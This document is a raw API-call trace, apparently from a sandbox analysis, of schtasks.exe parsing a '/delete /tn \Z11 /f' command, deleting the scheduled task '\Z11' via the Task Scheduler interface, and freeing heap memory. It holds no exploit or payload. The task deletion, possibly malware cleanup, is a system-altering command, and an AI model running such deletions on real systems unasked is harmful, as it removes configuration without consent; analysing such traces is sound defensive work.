[0380.445] SetLastError (dwErrCode=0x490)
[0380.445] lstrlenW (lpString="p") returned 1
[0380.445] lstrlenW (lpString="p") returned 1
[0380.445] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.445] lstrlenW (lpString="TN") returned 2
[0380.445] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.445] _vsnwprintf (in: _Buffer=0x9c2d0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24efc8 | out: _Buffer="|p|") returned 3
[0380.445] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x24efc8 | out: _Buffer="|TN|") returned 4
[0380.445] lstrlenW (lpString="|p|") returned 3
[0380.445] lstrlenW (lpString="|TN|") returned 4
[0380.445] SetLastError (dwErrCode=0x490)
[0380.445] lstrlenW (lpString="tn") returned 2
[0380.445] lstrlenW (lpString="tn") returned 2
[0380.446] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.446] lstrlenW (lpString="TN") returned 2
[0380.446] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.446] _vsnwprintf (in: _Buffer=0x9c2d0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x24efc8 | out: _Buffer="|tn|") returned 4
[0380.446] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x24efc8 | out: _Buffer="|TN|") returned 4
[0380.446] lstrlenW (lpString="|tn|") returned 4
[0380.446] lstrlenW (lpString="|TN|") returned 4
[0380.446] StrStrIW (lpFirst="|tn|", lpSrch="|TN|") returned="|tn|"
[0380.446] SetLastError (dwErrCode=0x0)
[0380.446] SetLastError (dwErrCode=0x0)
[0380.446] lstrlenW (lpString="\\Z11") returned 4
[0380.446] lstrlenW (lpString="-/") returned 2
[0380.446] StrChrIW (lpStart="-/", wMatch=0x5c) returned 0x0
[0380.446] SetLastError (dwErrCode=0x490)
[0380.447] SetLastError (dwErrCode=0x490)
[0380.447] SetLastError (dwErrCode=0x0)
[0380.447] lstrlenW (lpString="\\Z11") returned 4
[0380.447] StrChrIW (lpStart="\\Z11", wMatch=0x3a) returned 0x0
[0380.447] SetLastError (dwErrCode=0x490)
[0380.447] SetLastError (dwErrCode=0x0)
[0380.447] lstrlenW (lpString="\\Z11") returned 4
[0380.447] SetLastError (dwErrCode=0x0)
[0380.447] SetLastError (dwErrCode=0x0)
[0380.447] lstrlenW (lpString="/f") returned 2
[0380.447] lstrlenW (lpString="-/") returned 2
[0380.447] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0380.447] lstrlenW (lpString="delete") returned 6
[0380.447] lstrlenW (lpString="delete") returned 6
[0380.447] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.448] lstrlenW (lpString="f") returned 1
[0380.448] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.448] _vsnwprintf (in: _Buffer=0x9c2d0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x24efc8 | out: _Buffer="|delete|") returned 8
[0380.448] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24efc8 | out: _Buffer="|f|") returned 3
[0380.448] lstrlenW (lpString="|delete|") returned 8
[0380.448] lstrlenW (lpString="|f|") returned 3
[0380.448] StrStrIW (lpFirst="|delete|", lpSrch="|f|") returned 0x0
[0380.448] SetLastError (dwErrCode=0x490)
[0380.448] lstrlenW (lpString="?") returned 1
[0380.448] lstrlenW (lpString="?") returned 1
[0380.448] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.449] lstrlenW (lpString="f") returned 1
[0380.449] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.449] _vsnwprintf (in: _Buffer=0x9c2d0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24efc8 | out: _Buffer="|?|") returned 3
[0380.449] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24efc8 | out: _Buffer="|f|") returned 3
[0380.449] lstrlenW (lpString="|?|") returned 3
[0380.450] lstrlenW (lpString="|f|") returned 3
[0380.450] StrStrIW (lpFirst="|?|", lpSrch="|f|") returned 0x0
[0380.450] SetLastError (dwErrCode=0x490)
[0380.450] lstrlenW (lpString="s") returned 1
[0380.450] lstrlenW (lpString="s") returned 1
[0380.450] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.450] lstrlenW (lpString="f") returned 1
[0380.450] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.450] _vsnwprintf (in: _Buffer=0x9c2d0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24efc8 | out: _Buffer="|s|") returned 3
[0380.450] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24efc8 | out: _Buffer="|f|") returned 3
[0380.450] lstrlenW (lpString="|s|") returned 3
[0380.450] lstrlenW (lpString="|f|") returned 3
[0380.451] StrStrIW (lpFirst="|s|", lpSrch="|f|") returned 0x0
[0380.451] SetLastError (dwErrCode=0x490)
[0380.451] lstrlenW (lpString="u") returned 1
[0380.451] lstrlenW (lpString="u") returned 1
[0380.451] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.451] lstrlenW (lpString="f") returned 1
[0380.451] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.451] _vsnwprintf (in: _Buffer=0x9c2d0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24efc8 | out: _Buffer="|u|") returned 3
[0380.451] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24efc8 | out: _Buffer="|f|") returned 3
[0380.451] lstrlenW (lpString="|u|") returned 3
[0380.451] lstrlenW (lpString="|f|") returned 3
[0380.451] StrStrIW (lpFirst="|u|", lpSrch="|f|") returned 0x0
[0380.452] SetLastError (dwErrCode=0x490)
[0380.452] lstrlenW (lpString="p") returned 1
[0380.452] lstrlenW (lpString="p") returned 1
[0380.452] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.452] lstrlenW (lpString="f") returned 1
[0380.452] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.452] _vsnwprintf (in: _Buffer=0x9c2d0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24efc8 | out: _Buffer="|p|") returned 3
[0380.452] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24efc8 | out: _Buffer="|f|") returned 3
[0380.452] lstrlenW (lpString="|p|") returned 3
[0380.452] lstrlenW (lpString="|f|") returned 3
[0380.452] StrStrIW (lpFirst="|p|", lpSrch="|f|") returned 0x0
[0380.452] SetLastError (dwErrCode=0x490)
[0380.453] lstrlenW (lpString="tn") returned 2
[0380.453] lstrlenW (lpString="tn") returned 2
[0380.453] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.453] lstrlenW (lpString="f") returned 1
[0380.453] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.453] _vsnwprintf (in: _Buffer=0x9c2d0, _BufferCount=0x5, _Format="|%s|", _ArgList=0x24efc8 | out: _Buffer="|tn|") returned 4
[0380.453] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24efc8 | out: _Buffer="|f|") returned 3
[0380.453] lstrlenW (lpString="|tn|") returned 4
[0380.453] lstrlenW (lpString="|f|") returned 3
[0380.453] StrStrIW (lpFirst="|tn|", lpSrch="|f|") returned 0x0
[0380.453] SetLastError (dwErrCode=0x490)
[0380.454] lstrlenW (lpString="f") returned 1
[0380.454] lstrlenW (lpString="f") returned 1
[0380.454] _memicmp (_Buf1=0x9c150, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.454] lstrlenW (lpString="f") returned 1
[0380.454] _memicmp (_Buf1=0x9c290, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.454] _vsnwprintf (in: _Buffer=0x9c2d0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24efc8 | out: _Buffer="|f|") returned 3
[0380.454] _vsnwprintf (in: _Buffer=0x9c2b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x24efc8 | out: _Buffer="|f|") returned 3
[0380.454] lstrlenW (lpString="|f|") returned 3
[0380.454] lstrlenW (lpString="|f|") returned 3
[0380.454] StrStrIW (lpFirst="|f|", lpSrch="|f|") returned="|f|"
[0380.454] SetLastError (dwErrCode=0x0)
[0380.454] SetLastError (dwErrCode=0x0)
[0380.454] lstrlenW (lpString="\\Z11") returned 4
[0380.455] SetLastError (dwErrCode=0x0)
[0380.455] LoadLibraryExA (lpLibFileName="API-MS-WIN-Service-Management-L1-1-0.dll", hFile=0x0, dwFlags=0x0) returned 0x7fefdef0000
[0380.459] GetProcAddress (hModule=0x7fefdef0000, lpProcName="OpenSCManagerW") returned 0x7fefdef659c
[0380.459] OpenSCManagerW (lpMachineName="", lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x9d030
[0380.470] GetProcAddress (hModule=0x7fefdef0000, lpProcName="OpenServiceW") returned 0x7fefdef6484
[0380.470] OpenServiceW (hSCManager=0x9d030, lpServiceName="Schedule", dwDesiredAccess=0x14) returned 0x0
[0380.472] GetProcAddress (hModule=0x7fefdef0000, lpProcName="CloseServiceHandle") returned 0x7fefdef6518
[0380.472] CloseServiceHandle (hSCObject=0x9d030) returned 1
[0380.476] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0
[0380.509] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0
[0380.529] CoCreateInstance (in: rclsid=0xffa51ae0*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x17, riid=0xffa51ad0*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x24e940 | out: ppv=0x24e940*=0x2cdef0) returned 0x0
[0380.553] TaskScheduler:ITaskService:Connect (This=0x2cdef0, serverName=0x24ea20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), user=0x24e9e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), domain=0x24ea00*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), password=0x24e9c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0)) returned 0x0
[0380.566] TaskScheduler:IUnknown:AddRef (This=0x2cdef0) returned 0x2
[0380.566] TaskScheduler:ITaskService:GetFolder (in: This=0x2cdef0, Path=0x0, ppFolder=0x24ea90 | out: ppFolder=0x24ea90*=0x3c7b30) returned 0x0
[0380.574] GetProcessHeap () returned 0x80000
[0380.574] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x18) returned 0xa1220
[0380.574] GetThreadLocale () returned 0x409
[0380.574] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="\\Z11", cchCount1=-1, lpString2="*", cchCount2=-1) returned 3
[0380.574] ITaskFolder:GetTask (in: This=0x3c7b30, Path="\\Z11", ppTask=0x24e9c0 | out: ppTask=0x24e9c0*=0x3c7b80) returned 0x0
[0380.598] lstrlenW (lpString="\\Z11") returned 4
[0380.598] GetProcessHeap () returned 0x80000
[0380.598] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0xa) returned 0xa12c0
[0380.598] GetProcessHeap () returned 0x80000
[0380.598] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x20) returned 0xb3870
[0380.598] IUnknown:Release (This=0x3c7b80) returned 0x0
[0380.599] ITaskFolder:DeleteTask (This=0x3c7b30, Name="", flags=0) returned 0x0
[0380.730] GetProcessHeap () returned 0x80000
[0380.730] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x20) returned 0xb38a0
[0380.730] _memicmp (_Buf1=0x9bb40, _Buf2=0xffa51b08, _Size=0x7) returned 0
[0380.730] LoadStringW (in: hInstance=0x0, uID=0x12d, lpBuffer=0x9d350, cchBufferMax=256 | out: lpBuffer="SUCCESS: The scheduled task \"%s\" was successfully deleted.\n") returned 0x3b
[0380.730] lstrlenW (lpString="SUCCESS: The scheduled task \"%s\" was successfully deleted.\n") returned 59
[0380.730] GetProcessHeap () returned 0x80000
[0380.730] RtlAllocateHeap (HeapHandle=0x80000, Flags=0xc, Size=0x78) returned 0xb7d50
[0380.730] _vsnwprintf (in: _Buffer=0x24eac0, _BufferCount=0x1fb, _Format="SUCCESS: The scheduled task \"%s\" was successfully deleted.\n", _ArgList=0x24ea88 | out: _Buffer="SUCCESS: The scheduled task \"\\Z11\" was successfully deleted.\n") returned 61
[0380.730] _fileno (_File=0x7feff862ab0) returned 1
[0380.731] _errno () returned 0x3c4bb0
[0380.731] _get_osfhandle (_FileHandle=1) returned 0x7
[0380.731] _errno () returned 0x3c4bb0
[0380.731] GetFileType (hFile=0x7) returned 0x2
[0380.731] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0380.731] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24ea00 | out: lpMode=0x24ea00) returned 1
[0380.732] __iob_func () returned 0x7feff862a80
[0380.732] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0380.732] lstrlenW (lpString="SUCCESS: The scheduled task \"\\Z11\" was successfully deleted.\n") returned 61
[0380.732] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x24eac0*, nNumberOfCharsToWrite=0x3d, lpNumberOfCharsWritten=0x24ea70, lpReserved=0x0 | out: lpBuffer=0x24eac0*, lpNumberOfCharsWritten=0x24ea70*=0x3d) returned 1
[0380.733] TaskScheduler:IUnknown:Release (This=0x3c7b30) returned 0x0
[0380.733] TaskScheduler:IUnknown:Release (This=0x2cdef0) returned 0x1
[0380.733] GetProcessHeap () returned 0x80000
[0380.733] GetProcessHeap () returned 0x80000
[0380.733] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9c270) returned 1
[0380.733] GetProcessHeap () returned 0x80000
[0380.733] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9c270) returned 0x16
[0380.734] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9c270 | out: hHeap=0x80000) returned 1
[0380.734] GetProcessHeap () returned 0x80000
[0380.734] GetProcessHeap () returned 0x80000
[0380.734] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9ba40) returned 1
[0380.734] GetProcessHeap () returned 0x80000
[0380.734] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9ba40) returned 0x18
[0380.734] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9ba40 | out: hHeap=0x80000) returned 1
[0380.734] GetProcessHeap () returned 0x80000
[0380.734] GetProcessHeap () returned 0x80000
[0380.734] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9cd30) returned 1
[0380.734] GetProcessHeap () returned 0x80000
[0380.734] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9cd30) returned 0x20
[0380.735] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9cd30 | out: hHeap=0x80000) returned 1
[0380.735] GetProcessHeap () returned 0x80000
[0380.735] GetProcessHeap () returned 0x80000
[0380.735] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9c0a0) returned 1
[0380.735] GetProcessHeap () returned 0x80000
[0380.735] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9c0a0) returned 0xa0
[0380.735] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9c0a0 | out: hHeap=0x80000) returned 1
[0380.736] GetProcessHeap () returned 0x80000
[0380.736] GetProcessHeap () returned 0x80000
[0380.736] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9bb20) returned 1
[0380.736] GetProcessHeap () returned 0x80000
[0380.736] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9bb20) returned 0x18
[0380.736] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9bb20 | out: hHeap=0x80000) returned 1
[0380.736] GetProcessHeap () returned 0x80000
[0380.736] GetProcessHeap () returned 0x80000
[0380.736] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9cc10) returned 1
[0380.736] GetProcessHeap () returned 0x80000
[0380.736] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9cc10) returned 0x20
[0380.737] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9cc10 | out: hHeap=0x80000) returned 1
[0380.737] GetProcessHeap () returned 0x80000
[0380.737] GetProcessHeap () returned 0x80000
[0380.737] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9bca0) returned 1
[0380.737] GetProcessHeap () returned 0x80000
[0380.737] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9bca0) returned 0x208
[0380.737] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9bca0 | out: hHeap=0x80000) returned 1
[0380.737] GetProcessHeap () returned 0x80000
[0380.737] GetProcessHeap () returned 0x80000
[0380.737] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9bb00) returned 1
[0380.737] GetProcessHeap () returned 0x80000
[0380.737] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9bb00) returned 0x18
[0380.738] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9bb00 | out: hHeap=0x80000) returned 1
[0380.738] GetProcessHeap () returned 0x80000
[0380.738] GetProcessHeap () returned 0x80000
[0380.738] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x95d20) returned 1
[0380.738] GetProcessHeap () returned 0x80000
[0380.738] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x95d20) returned 0x20
[0380.738] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x95d20 | out: hHeap=0x80000) returned 1
[0380.738] GetProcessHeap () returned 0x80000
[0380.738] GetProcessHeap () returned 0x80000
[0380.738] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9d350) returned 1
[0380.738] GetProcessHeap () returned 0x80000
[0380.739] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9d350) returned 0x200
[0380.739] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9d350 | out: hHeap=0x80000) returned 1
[0380.739] GetProcessHeap () returned 0x80000
[0380.739] GetProcessHeap () returned 0x80000
[0380.739] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9bb40) returned 1
[0380.739] GetProcessHeap () returned 0x80000
[0380.739] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9bb40) returned 0x18
[0380.739] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9bb40 | out: hHeap=0x80000) returned 1
[0380.739] GetProcessHeap () returned 0x80000
[0380.739] GetProcessHeap () returned 0x80000
[0380.740] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x95c90) returned 1
[0380.740] GetProcessHeap () returned 0x80000
[0380.740] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x95c90) returned 0x20
[0380.740] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x95c90 | out: hHeap=0x80000) returned 1
[0380.740] GetProcessHeap () returned 0x80000
[0380.740] GetProcessHeap () returned 0x80000
[0380.740] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9c2b0) returned 1
[0380.740] GetProcessHeap () returned 0x80000
[0380.740] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9c2b0) returned 0x14
[0380.740] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9c2b0 | out: hHeap=0x80000) returned 1
[0380.741] GetProcessHeap () returned 0x80000
[0380.741] GetProcessHeap () returned 0x80000
[0380.741] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9c290) returned 1
[0380.741] GetProcessHeap () returned 0x80000
[0380.741] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9c290) returned 0x18
[0380.741] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9c290 | out: hHeap=0x80000) returned 1
[0380.741] GetProcessHeap () returned 0x80000
[0380.741] GetProcessHeap () returned 0x80000
[0380.741] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x95bd0) returned 1
[0380.741] GetProcessHeap () returned 0x80000
[0380.741] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x95bd0) returned 0x20
[0380.742] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x95bd0 | out: hHeap=0x80000) returned 1
[0380.742] GetProcessHeap () returned 0x80000
[0380.742] GetProcessHeap () returned 0x80000
[0380.742] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9c2d0) returned 1
[0380.742] GetProcessHeap () returned 0x80000
[0380.742] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9c2d0) returned 0x16
[0380.742] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9c2d0 | out: hHeap=0x80000) returned 1
[0380.742] GetProcessHeap () returned 0x80000
[0380.742] GetProcessHeap () returned 0x80000
[0380.742] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9c150) returned 1
[0380.742] GetProcessHeap () returned 0x80000
[0380.742] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9c150) returned 0x18
[0380.743] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9c150 | out: hHeap=0x80000) returned 1
[0380.743] GetProcessHeap () returned 0x80000
[0380.743] GetProcessHeap () returned 0x80000
[0380.743] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x95ba0) returned 1
[0380.743] GetProcessHeap () returned 0x80000
[0380.743] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x95ba0) returned 0x20
[0380.743] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x95ba0 | out: hHeap=0x80000) returned 1
[0380.743] GetProcessHeap () returned 0x80000
[0380.743] GetProcessHeap () returned 0x80000
[0380.743] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9ba80) returned 1
[0380.743] GetProcessHeap () returned 0x80000
[0380.744] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9ba80) returned 0x2
[0380.744] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9ba80 | out: hHeap=0x80000) returned 1
[0380.744] GetProcessHeap () returned 0x80000
[0380.744] GetProcessHeap () returned 0x80000
[0380.744] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x959f0) returned 1
[0380.744] GetProcessHeap () returned 0x80000
[0380.744] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x959f0) returned 0x20
[0380.744] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x959f0 | out: hHeap=0x80000) returned 1
[0380.744] GetProcessHeap () returned 0x80000
[0380.745] GetProcessHeap () returned 0x80000
[0380.745] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x95a20) returned 1
[0380.745] GetProcessHeap () returned 0x80000
[0380.745] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x95a20) returned 0x20
[0380.745] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x95a20 | out: hHeap=0x80000) returned 1
[0380.745] GetProcessHeap () returned 0x80000
[0380.745] GetProcessHeap () returned 0x80000
[0380.745] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x95a50) returned 1
[0380.745] GetProcessHeap () returned 0x80000
[0380.746] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x95a50) returned 0x20
[0380.746] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x95a50 | out: hHeap=0x80000) returned 1
[0380.746] GetProcessHeap () returned 0x80000
[0380.746] GetProcessHeap () returned 0x80000
[0380.746] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x95a80) returned 1
[0380.746] GetProcessHeap () returned 0x80000
[0380.746] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x95a80) returned 0x20
[0380.747] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x95a80 | out: hHeap=0x80000) returned 1
[0380.747] GetProcessHeap () returned 0x80000
[0380.747] GetProcessHeap () returned 0x80000
[0380.747] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9cc40) returned 1
[0380.747] GetProcessHeap () returned 0x80000
[0380.747] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9cc40) returned 0x20
[0380.747] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9cc40 | out: hHeap=0x80000) returned 1
[0380.747] GetProcessHeap () returned 0x80000
[0380.747] GetProcessHeap () returned 0x80000
[0380.747] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9cc70) returned 1
[0380.747] GetProcessHeap () returned 0x80000
[0380.748] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9cc70) returned 0x20
[0380.748] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9cc70 | out: hHeap=0x80000) returned 1
[0380.748] GetProcessHeap () returned 0x80000
[0380.748] GetProcessHeap () returned 0x80000
[0380.748] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x97c50) returned 1
[0380.748] GetProcessHeap () returned 0x80000
[0380.748] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x97c50) returned 0x30
[0380.749] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x97c50 | out: hHeap=0x80000) returned 1
[0380.749] GetProcessHeap () returned 0x80000
[0380.749] GetProcessHeap () returned 0x80000
[0380.749] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9cca0) returned 1
[0380.749] GetProcessHeap () returned 0x80000
[0380.749] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9cca0) returned 0x20
[0380.749] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9cca0 | out: hHeap=0x80000) returned 1
[0380.749] GetProcessHeap () returned 0x80000
[0380.749] GetProcessHeap () returned 0x80000
[0380.749] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x97c90) returned 1
[0380.749] GetProcessHeap () returned 0x80000
[0380.749] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x97c90) returned 0x30
[0380.750] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x97c90 | out: hHeap=0x80000) returned 1
[0380.750] GetProcessHeap () returned 0x80000
[0380.750] GetProcessHeap () returned 0x80000
[0380.750] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0x9cd00) returned 1
[0380.750] GetProcessHeap () returned 0x80000
[0380.750] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0x9cd00) returned 0x20
[0380.751] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0x9cd00 | out: hHeap=0x80000) returned 1
[0380.751] GetProcessHeap () returned 0x80000
[0380.751] GetProcessHeap () returned 0x80000
[0380.751] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0xb7d50) returned 1
[0380.751] GetProcessHeap () returned 0x80000
[0380.751] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0xb7d50) returned 0x78
[0380.751] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0xb7d50 | out: hHeap=0x80000) returned 1
[0380.751] GetProcessHeap () returned 0x80000
[0380.751] GetProcessHeap () returned 0x80000
[0380.751] HeapValidate (hHeap=0x80000, dwFlags=0x0, lpMem=0xb38a0) returned 1
[0380.752] GetProcessHeap () returned 0x80000
[0380.752] RtlSizeHeap (HeapHandle=0x80000, Flags=0x0, MemoryPointer=0xb38a0) returned 0x20
[0380.752] HeapFree (in: hHeap=0x80000, dwFlags=0x0, lpMem=0xb38a0 | out: hHeap=0x80000) returned 1
